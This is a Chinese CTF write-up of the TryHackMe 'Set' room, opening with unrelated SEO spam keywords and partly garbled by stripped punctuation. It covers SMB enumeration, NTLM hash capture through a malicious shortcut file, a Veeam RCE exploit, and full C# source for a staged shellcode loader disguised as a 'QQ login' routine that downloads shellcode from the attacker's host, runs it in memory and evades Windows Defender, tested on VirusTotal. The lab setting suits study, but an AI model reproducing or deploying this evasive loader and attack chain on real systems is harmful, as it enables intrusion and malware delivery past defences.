做网站哪里找,大学的一级或二级域名,移动网站建设自助建站,百度网站推广服务商Set
您再次发现自己在Windcorp公司的内部网络上。上次你去那里的味道真好#xff0c;你回来了 了解更多。
但是#xff0c;这次他们设法保护了域控制器#xff0c;因此您需要找到另一台服务器#xff0c;并在第一次扫描时发现“Set”。
Set被用作开发人员的平台#xf…Set
您再次发现自己在Windcorp公司的内部网络上。上次你去那里的味道真好你回来了 了解更多。
但是这次他们设法保护了域控制器因此您需要找到另一台服务器并在第一次扫描时发现“Set”。
Set被用作开发人员的平台最近遇到了一些问题。他们不得不重置很多用户并恢复备份也许您不是他们网络上唯一的黑客因此他们决定确保所有用户都使用正确的密码并关闭一些松散的策略。 你还能找到进去的路吗某些用户是否比其他用户更有特权还是更草率的也许您需要跳出框框思考一下以规避他们的新安全控制… 端口扫描
循例nmap 有两个子域加进hosts
Web枚举
进到set子域 在主页的源代码中的search.js发现了user.xml里面记录了姓名、电话和邮箱 先把xml保存一下可能会有用
gobuster扫一下 SMB枚举
appnotes.txt这意味着可能会有账户的密码会比较薄弱 提取用户名 使用username-generator.py生成可能的账户名 crackmapexec爆 按这个速度爆下去估计没个10天半个月都爆不完我选择看一眼wp是哪个账户 smbmap看一眼 用smbclient连接获得info.txt flag1和一些信息 立足 - SMB-NTLM回传
它会自动读取我们上传的zip文件并查看里面的文件
我们都知道windows可以直接通过\\ip\share来远程访问文件, 在thm中我们已经用过很多次了
如果它要是带着ntlm hash过来那么我们将可以利用其凭据进行下一步操作
利用mslink创建链接文件指向攻击机的smb share 压缩zip然后上传
responder开启监听获得michellewat的hash hashcat直接爆 看见开了5985端口直接winrm登进来同时拿到flag2 Veeam未授权RCE
netstat发现一个2805端口 查看进程 百度了解了下veeamwmic、get-service、accesschk都用不了
直接暴力枚举 查看版本 看一眼nvd 该版本存在漏洞现在应该要进行端口转发出来看看
2805端口虽然开在了0.0.0.0但攻击机无法访问到我也尝试了frp、chisel、ssh反向连接应该是因为防火墙或是其他的缘故连接不到攻击机
使用plink借助ssh来进行ssh反向连接并进行远程端口转发 攻击机查看没问题 msf有exp 由于WinDefender的存在我们无法直接使用msf进行getshell
并且还需要对msf的exp进行修改使用windows/x64/exec执行命令这样不会被WinDefender察觉 免杀 - Bypass WinDefender
现在虽然能够成功执行命令但这是一次绝佳的免杀练习机会
首先我们选择做一个简单的分阶段的shellcode加载器基于C#
using System;
using System.Runtime.InteropServices;
using System.Net;class Program
{[DllImport(kernel32)]private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);[DllImport(kernel32)]private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);[DllImport(kernel32)]private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);static void Main(string[] args){LoginQQ();}public static void LoginQQ(){string qq_loginURI http://10.14.39.48:8000/login_qq_api;WebClient webClient new WebClient();byte[] qqLoginState webClient.DownloadData(qq_loginURI);UInt32 QQOpen VirtualAlloc(0, (UInt32)qqLoginState.Length, 0x1000, 0x40);Marshal.Copy(qqLoginState, 0, (IntPtr)(QQOpen), qqLoginState.Length);IntPtr QQHandle IntPtr.Zero;UInt32 QQthreadId 0;IntPtr QQparameter IntPtr.Zero;QQHandle CreateThread(0, 0, QQOpen, QQparameter, 0, ref QQthreadId);WaitForSingleObject(QQHandle, 0xFFFFFFFF);}
}我们考虑了熵, 它挺低的至少满足了thm教程中所说的5.x、6.x 简单的通过http获取shellcode并利用win32 api写入内存并执行
使用csc编译得到exe
上传到VirusTotal分析一下 我们编写的“QQ”很幸运它绕过了大多数AV检测包括WinDefender
这仅仅只使用了thm教导了一小部分知识就这么轻松绕过了或许是得益于分阶段优势的原因吧 免杀马测试
这么简单的免杀就到此为止当然我们并没有考虑运行时的内存检测但让我们碰碰运气
生成shellcode python开启http服务把steged loader传过去
直接运行loader loader会请求所谓的“login_qq_api”其实这是我们的shellcode nc监听的情况成功getshell并且没有运行时的内存检测我们的免杀成功 权限提升 - 免杀马利用
回到房间正文我们继续利用veeam的exp来通过我们的免杀马getshell nc监听成功过来one账户 该账户已经在administrators组中并且shell是高IL 拿下最后的flag3 结束
整个房间或许难点应该在于绕过WinDefender做免杀这但我有thm教导的知识很轻松就绕过了
值得纪念的一天这也是我第一次将thm教导一的小部分的红队免杀知识交付于此
